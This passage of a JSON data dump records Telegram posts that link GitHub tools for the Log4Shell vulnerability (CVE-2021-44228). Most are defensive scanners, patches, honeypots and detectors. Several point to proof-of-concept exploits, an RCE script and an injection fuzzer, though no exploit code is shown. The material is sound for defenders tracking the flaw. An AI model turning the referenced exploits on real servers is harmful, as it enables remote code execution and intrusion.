"282207fc-2d91-474f-845f-d10267c679e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1433", "content": "#CVE-2021\n#Log4j\n#Log4Shell \nA testing script that checks for vulnerable Log4j Log4Shell (CVE-2021-44228) systems using injection of the payload in common HTTP headers and as a part of a HTTP GET request.\n\nhttps://github.com/NorthwaveSecurity/log4jcheck\n\n@BlueRedTeam", "creation_timestamp": "2021-12-14T11:05:10.000000Z"}, {"uuid": "c4692096-ebb2-4d96-8674-e430e81a4fde", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1434", "content": "#CVE-2021\n#Log4j2 \n#Log4Shell \nFind vulnerable Log4j2 versions on disk and also inside Java Archive Files (Log4Shell CVE-2021-44228)\n\nhttps://github.com/fox-it/log4j-finder\n\n@BlueRedTeam", "creation_timestamp": "2021-12-14T12:00:00.000000Z"}, {"uuid": "66b6bf0b-1bc3-4e03-840d-22682453a62f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1435", "content": "#CVE-2021\n#Log4Shell \n#Log4j \nBash and PowerShell scripts to scan a local filesystem for Log4j components vulnerable to CVE-2021-44228 / Log4Shell.\n\nhttps://github.com/Occamsec/log4j-checker\n\n@BlueRedTeam", "creation_timestamp": "2021-12-14T12:38:23.000000Z"}, {"uuid": "e1727be0-a023-41c3-a989-0ef7efd6554c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1436", "content": "#CVE-2021\n#Log4j \n\nlog4j version 1 with a patch for CVE-2021-44228 vulnerability\n\nhttps://github.com/p3dr16k/log4j-1.2.15-mod\n\n@BlueRedTeam", "creation_timestamp": "2021-12-14T12:50:35.000000Z"}, {"uuid": "0cbb1fb0-9043-4e53-a949-fff371ccd4b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1299", "content": "#Honeypot \n\nMinecraft Honeypot for Log4j exploit. CVE-2021-44228 Log4Shell LogJam\n\nhttps://github.com/Adikso/minecraft-log4j-honeypot\n\n@BlueRedTeam", "creation_timestamp": "2021-12-11T05:03:39.000000Z"}, {"uuid": "65c769c9-d1d7-41a6-ab1b-fc09455b3979", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1300", "content": "#CVE\nA short demo of CVE-2021-44228\n\nhttps://github.com/phoswald/sample-ldap-exploit\n\n@BlueRedTeam", "creation_timestamp": "2021-12-11T05:04:45.000000Z"}, {"uuid": "ee197123-2005-4749-9a61-b390c556e4b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1301", "content": "#CVE 2021\n\nA Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability. \n\nhttps://github.com/kozmer/log4j-shell-poc\n\n@BlueRedTeam", "creation_timestamp": "2021-12-11T05:05:46.000000Z"}, {"uuid": "915e03fa-f007-40cb-b54b-2c07108ae50b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1390", "content": "#CVE-2021\n\nCVE-2021-44228 on Podman\n\nhttps://github.com/ahmad4fifz/CVE-2021-44228-podman\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T18:33:01.000000Z"}, {"uuid": "82788f08-190a-4ac5-bae6-5f5f6ab09d19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1302", "content": "#CVE 2021\n#LDAP\nA minimalistic LDAP server that is meant for test vulnerability to JNDI+LDAP injection attacks in Java, especially CVE-2021-44228.\n\nhttps://github.com/rakutentech/jndi-ldap-test-server\n\n@BlueRedTeam", "creation_timestamp": "2021-12-11T05:07:05.000000Z"}, {"uuid": "b3e0a2ad-a529-497a-9f21-21874cd4910a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1303", "content": "#CVE 2021\n\nJava Agent that disables Apache Log4J's JNDI Lookup. Quick-fix for CVE-2021-44228\n\nhttps://github.com/alerithe/log4j-patcher\n\n@BlueRedTeam", "creation_timestamp": "2021-12-11T05:08:26.000000Z"}, {"uuid": "dc071de3-3cef-47ba-b7a9-f81794a48adf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1306", "content": "#CVE 2021\n\nCVE-2021-44228 DFIR Notes\n\nhttps://github.com/Azeemering/CVE-2021-44228-DFIR-Notes\n\n@BlueRedTeam", "creation_timestamp": "2021-12-11T11:15:27.000000Z"}, {"uuid": "15c1cf69-7524-4215-9ec7-031f5103c1fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1307", "content": "#CVE-2021\n#Log4shell\n\nScans files for .jars potentially vulnerable to Log4Shell (CVE-2021-44228) by inspecting the class paths inside the .jar.\n\nhttps://github.com/1lann/log4shelldetect\n\n@BlueRedTeam", "creation_timestamp": "2021-12-11T11:35:33.000000Z"}, {"uuid": "a657b760-e3b4-4cc3-abe7-b2e5c1c88910", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1335", "content": "#CVE-2021\n\nAn All-In-One Pure Python PoC for CVE-2021-44228\n\nhttps://github.com/alexandre-lavoie/python-log4rce\n\n@BlueRedTeam", "creation_timestamp": "2022-01-29T09:12:07.000000Z"}, {"uuid": "cd6f44a5-75ca-4655-a3e5-d7223d35f8cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1346", "content": "#CVE-2021\n#Log4j \nAbuse Log4J CVE-2021-44228 to patch CVE-2021-44228 in vulnerable Minecraft game sessions to prevent exploitation in the session :) \n\nhttps://github.com/0-x-2-2/CVE-2021-44228\n\n@BlueRedTeam", "creation_timestamp": "2021-12-12T12:31:55.000000Z"}, {"uuid": "1dc1cb8e-3691-4850-81e0-538375bbf3be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1373", "content": "#CVE-2021\n#Log4j\n\nScanner for Log4j RCE CVE-2021-44228\n\nhttps://github.com/thecyberneh/Log4j-RCE-Exploiter\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T11:01:01.000000Z"}, {"uuid": "3033db4a-f7ad-4c43-941f-f5f1f6210b34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1415", "content": "#CVE-2021\n#Log4j \nProva de conceito da vulnerabulidade CVE-2021-44228.\n\nhttps://github.com/igoritos22/log4jpoc\n\n@BlueRedTeam", "creation_timestamp": "2021-12-14T02:16:29.000000Z"}, {"uuid": "b0b7a837-0dd8-4761-9339-283af02a23c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1416", "content": "#CVE-2021\n#Log4Shell \nPCRE RegEx matching Log4Shell CVE-2021-44228 IOC in your logs\n\nhttps://github.com/back2root/log4shell-rex\n\n@BlueRedTeam", "creation_timestamp": "2021-12-14T02:22:08.000000Z"}, {"uuid": "035604c6-d2bf-4cdb-a3dd-0275177b5620", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1417", "content": "#CVE-2021\n#log4j2 \nDemo project to evaluate Log4j2 Vulnerability | CVE-2021-44228\n\nhttps://github.com/sandarenu/log4j2-issue-check\n\n@BlueRedTeam", "creation_timestamp": "2021-12-14T09:36:42.000000Z"}, {"uuid": "b45aec97-0595-460f-9186-37d0ba04b849", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1446", "content": "#CVE-2021\n#log4j \n\nTools for investigating Log4j CVE-2021-44228\n\nhttps://github.com/MalwareTech/Log4jTools\n\n@BlueRedTeam", "creation_timestamp": "2021-12-14T21:20:03.000000Z"}, {"uuid": "ef53b750-f1fe-46e4-8a50-016c76c50008", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1447", "content": "#CVE-2021\n#log4j \nGenerate CVE-2021-44228 commands to test servers with ease!\n\nhttps://github.com/csduncan9/Log4j-CVE-2021-44228-command-generator\n\n@BlueRedTeam", "creation_timestamp": "2021-12-14T21:23:01.000000Z"}, {"uuid": "048f907e-e0a7-478d-b44e-7f0f73047fa8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1448", "content": "#Red_Team\n\nSome files for red team/blue team investigations into CVE-2021-44228\n\nhttps://github.com/jmarcbaker/Red-vs-Blue-Team-Project-II\n\n@BlueRedTeam", "creation_timestamp": "2021-12-14T21:28:01.000000Z"}, {"uuid": "96818612-1381-4e10-9f24-62a4daccb31a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1453", "content": "#CVE-2021\n#Log4j \nUsing code search to help fix/mitigate log4j CVE-2021-44228\n\nhttps://github.com/sourcegraph/log4j-cve-code-search-resources\n\n@BlueRedTeam", "creation_timestamp": "2021-12-15T02:46:01.000000Z"}, {"uuid": "94531bf3-5697-4794-8284-fb351a7cff0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1362", "content": "#CVE-2021\n#Nmap \n#log4Shell \nNmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228)\n\nhttps://github.com/Diverto/nse-log4shell\n\n@BlueRedTeam", "creation_timestamp": "2022-01-29T09:12:07.000000Z"}, {"uuid": "0d491f6f-3961-4780-9eb0-b8bf22f9faca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1363", "content": "#CVE-2021\n#log4Shell \npure pythonic python RCE for CVE-2021-44228 log4shell\n\nhttps://github.com/dotPY-hax/log4py\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T00:07:19.000000Z"}, {"uuid": "613a199c-5938-4433-ac40-7abb1d82ffe4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1364", "content": "#CVE-2021\n#log4j2\nTest locally an exploit for Log4J2's CVE-2021-44228 (Log4Shell)\n\nhttps://github.com/sunnyvale-it/CVE-2021-44228-PoC\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T00:59:54.000000Z"}, {"uuid": "86f11794-0686-4cec-9fc9-5ff4257f75c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1454", "content": "#CVE-2021\n#Log4j \nLog4j CVE-2021-44228 finder and patcher\n\nhttps://github.com/xsultan/log4jshield\n\n@BlueRedTeam", "creation_timestamp": "2021-12-15T02:49:01.000000Z"}, {"uuid": "77e34c08-a226-49f5-aee8-68c7f0182308", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1365", "content": "#CVE-2021\n#Red_Team\n#Blue_Team\nSome files for red team/blue team investigations into CVE-2021-44228\n\nhttps://github.com/kimobu/cve-2021-44228\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T01:30:21.000000Z"}, {"uuid": "cf0dafb2-01fa-4376-aca9-4d18d3edabf0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1366", "content": "#CVE-2021\n\nFun things against the abuse of the recent CVE-2021-44228 (Log4Shell) vulnerability using common web servers.\n\nhttps://github.com/KainsRache/anti-jndi\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T02:03:01.000000Z"}, {"uuid": "572af407-137b-4fe8-87ba-a66455cd0a9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1455", "content": "#CVE-2021\n\nScanners for Jar files that may be vulnerable to CVE-2021-44228\n\nhttps://github.com/CERTCC/CVE-2021-44228_scanner\n\n@BlueRedTeam", "creation_timestamp": "2021-12-15T02:52:01.000000Z"}, {"uuid": "d5a03c8a-e7b7-4fd6-8bb6-9249c3f06d6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1367", "content": "#CVE-2021\n#Log4j\n\nfail2ban filter that catches attacks againts log4j CVE-2021-44228\n\nhttps://github.com/atnetws/fail2ban-log4j\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T02:32:01.000000Z"}, {"uuid": "2bbc3a13-8485-4687-9904-a64fdde61974", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1368", "content": "#CVE-2021\n#Log4j\nThis is a proof-of-concept exploit for Log4j RCE Unauthenticated (CVE-2021-44228).\n\nhttps://github.com/pedrohavay/exploit-CVE-2021-44228\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T03:21:28.000000Z"}, {"uuid": "670eb1dd-d910-48e9-bcfc-172a72089405", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1369", "content": "#CVE-2021\n\nIngest GreyNoise.io malicious feed for CVE-2021-44228 and apply null routes\n\nhttps://github.com/0xRyan/log4j-nullroute\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T09:39:03.000000Z"}, {"uuid": "eebee1ea-2729-4d40-afb9-4273cee275b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1456", "content": "#CVE-2021\n\nCVE-2021-44228 Response Scripts\n\nhttps://github.com/0xThiebaut/CVE-2021-44228\n\n@BlueRedTeam", "creation_timestamp": "2021-12-15T02:55:03.000000Z"}, {"uuid": "d155cddc-170d-4cbe-b59c-6f18b119d425", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1457", "content": "#CVE-2021\n\nScanning for CVE-2021-44228\n\nhttps://github.com/dbzoo/log4j_scanner\n\n@BlueRedTeam", "creation_timestamp": "2021-12-15T04:01:57.000000Z"}, {"uuid": "1cce39c3-19f0-49cb-bb40-46a7f24f7ba9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1387", "content": "#CVE-2021\n#log4j \nLog4j CVE-2021-44228 (Re lte+CE sample)\n\nhttps://github.com/manuel-alvarez-alvarez/log4j-cve-2021-44228\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T17:30:23.000000Z"}, {"uuid": "92971736-ed5c-4873-b91b-7273d9863fcd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1400", "content": "#CVE-2021\n#Log4j2 \nCVE-2021-44228\n\nhttps://github.com/trevalkov/log4j2-prosecutor\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T22:54:10.000000Z"}, {"uuid": "cee9a7eb-5dc5-4fa3-8c27-2e3f8dac461a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1458", "content": "#CVE-2021\n#Log4j2\nLog4j2 jndi injection fuzz tool (CVE-2021-44228)\n\nhttps://github.com/zhzyker/logmap\n\n@BlueRedTeam", "creation_timestamp": "2021-12-15T04:24:46.000000Z"}, {"uuid": "cf1eaa21-cea2-4a5f-848d-cfd2856ee222", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1449", "content": "#CVE-2021\n\nSimple Spring Boot application vulnerable to CVE-2021-44228\n\nhttps://github.com/guerzon/log4shellpoc\n\n@BlueRedTeam", "creation_timestamp": "2021-12-15T02:33:02.000000Z"}, {"uuid": "56495b7d-7838-4127-93e3-a7f6163a66c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1450", "content": "#CVE-2021\n#log4Shell \n#log4j \nA firewall reverse proxy for preventing Log4J (Log4Shell aka CVE-2021-44228) attacks.\n\nhttps://github.com/mufeedvh/log4jail\n\n@BlueRedTeam", "creation_timestamp": "2021-12-15T02:37:01.000000Z"}, {"uuid": "6127fb8c-4a4e-45c5-a1b6-3c71d3edf08d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1459", "content": "#Blue_Team\n\n1. Internal network honeypot for detecting if an attacker/insider threat scans network for log4j CVE-2021-44228\nhttps://github.com/BinaryDefense/log4j-honeypot-flash\n2. Detector for Log4Shell exploitation attempts\nhttps://github.com/Neo23x0/log4shell-detector\n\n@BlueRedTeam", "creation_timestamp": "2021-12-15T04:27:01.000000Z"}, {"uuid": "b83052ef-2774-4f98-a4a0-ddc45cbb84b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1451", "content": "#CVE-2021\n#log4j \nA Byte Buddy Java agent-based fix for CVE-2021-44228, the log4j 2.x \\\"JNDI LDAP\\\" vulnerability.\n\nhttps://github.com/nccgroup/log4j-jndi-be-gone\n\n@BlueRedTeam", "creation_timestamp": "2021-12-15T02:40:01.000000Z"}, {"uuid": "da4abdc6-bd09-440a-b6e9-1b5d8cc38fe1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1461", "content": "#CVE-2021\n#Log4j\nLog4J Updater Bash Script to automate the framework update process on numerous machines and prevent the CVE-2021-44228\n\nhttps://github.com/VinniMarcon/Log4jUpdater\n\n@BlueRedTeam", "creation_timestamp": "2021-12-15T05:40:12.000000Z"}, {"uuid": "992a0c84-2dad-4282-9c63-617aefa4f84e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1462", "content": "#CVE-2021\n#Log4j \nThis project is just to show Apache Log4j2 Vulnerability - aka CVE-2021-44228\n\nhttps://github.com/bhprin/log4j-vul\n\n@BlueRedTeam", "creation_timestamp": "2021-12-15T07:04:17.000000Z"}, {"uuid": "7a516aa9-904e-4cf6-b297-97190e178237", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1464", "content": "#CVE-2021\n#log4j \n#log4Shell \nA playground for poking at the Log4Shell (CVE-2021-44228) vulnerability mitigations\n\nhttps://github.com/rgl/log4j-log4shell-playground\n\n@BlueRedTeam", "creation_timestamp": "2021-12-15T09:18:16.000000Z"}, {"uuid": "2d29ff28-bcdd-4c80-8307-64394d06b9f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1465", "content": "#CVE-2021\nIdentifying all log4j components across all windows servers, entire domain, can be multi domain. CVE-2021-44228\n\nhttps://github.com/KeysAU/Get-log4j-Windows.ps1\n\n@BlueRedTeam", "creation_timestamp": "2021-12-15T12:26:31.000000Z"}, {"uuid": "74bc2ff3-0345-427a-b0a4-6cfca8179b85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1466", "content": "#CVE-2021\n#log4j2\nVulnerability scanner and mitigation patch for Log4j2 CVE-2021-44228\n\nhttps://github.com/jyotisahu98/logpresso-CVE-2021-44228-Scanner\n\n@BlueRedTeam", "creation_timestamp": "2021-12-15T12:28:00.000000Z"}, {"uuid": "8483216d-118e-43d6-af9b-ebd494d53799", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1467", "content": "#CVE-2021\n#log4j\nNmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228)\n\nhttps://github.com/gitlab-de/log4j-resources\n\n@BlueRedTeam", "creation_timestamp": "2021-12-15T12:50:01.000000Z"}, {"uuid": "32f944a0-3f27-4f2e-bed0-11d123a878a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1468", "content": "#CVE-2021\n\nHot-patch CVE-2021-44228 by exploiting the vulnerability itself.\n\nhttps://github.com/qingtengyun/cve-2021-44228-qingteng-online-patch\n\n@BlueRedTeam", "creation_timestamp": "2021-12-15T13:20:55.000000Z"}, {"uuid": "6ac812b0-4c61-40d8-a558-9475e8b2d957", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1471", "content": "#CVE-2021\n#log4j \nApache Log4j Zero Day Vulnerability aka Log4Shell aka CVE-2021-44228\n\nhttps://github.com/kubearmor/log4j-cve\n\n@BlueRedTeam", "creation_timestamp": "2021-12-15T18:03:20.000000Z"}, {"uuid": "e71b532b-f0e7-43ab-8d1d-8cbe58597e7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1474", "content": "#CVE-2021\n#log4j \nScans for Log4j versions effected by CVE-2021-44228\n\nhttps://github.com/inettgmbh/checkmk-log4j-scanner\n\n@BlueRedTeam", "creation_timestamp": "2021-12-15T18:40:35.000000Z"}, {"uuid": "86fb66ed-89c1-4e17-b772-e417792cad60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1484", "content": "#CVE-2021\n#Log4j \nThis script is used to perform a fast check if your server is possibly affected by CVE-2021-44228 (the log4j vulnerability).\n\nhttps://github.com/rv4l3r3/log4v-vuln-check\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T06:42:18.000000Z"}, {"uuid": "ede79911-d6e6-4fd2-b107-b78c7510dbac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1485", "content": "#CVE-2021\n#Log4j \nlog4j vulnerability wrapper scanner for CVE-2021-44228\n\nhttps://github.com/dpomnean/log4j_scanner_wrapper\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T06:42:55.000000Z"}, {"uuid": "e0eec8cf-d719-4263-94f5-1caf14397d48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1505", "content": "#CVE-2021\n#Log4j \nBurp Active Scan extension to identify Log4j vulnerabilities CVE-2021-44228 and CVE-2021-45046\n\nhttps://github.com/DXC-StrikeForce/Burp-Log4j-HammerTime\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T18:26:15.000000Z"}, {"uuid": "baad6ca6-8a45-41c3-9a38-66c0dede064a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1391", "content": "#CVE-2021\nCheck if your server is vulnerable to the CVE-2021-44228. (node)\n\nhttps://github.com/AdriDevelopsThings/check-log4j-vulnerability\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T19:20:35.000000Z"}, {"uuid": "c31080e0-bec8-48fa-a5c1-7a003e87e7bc", 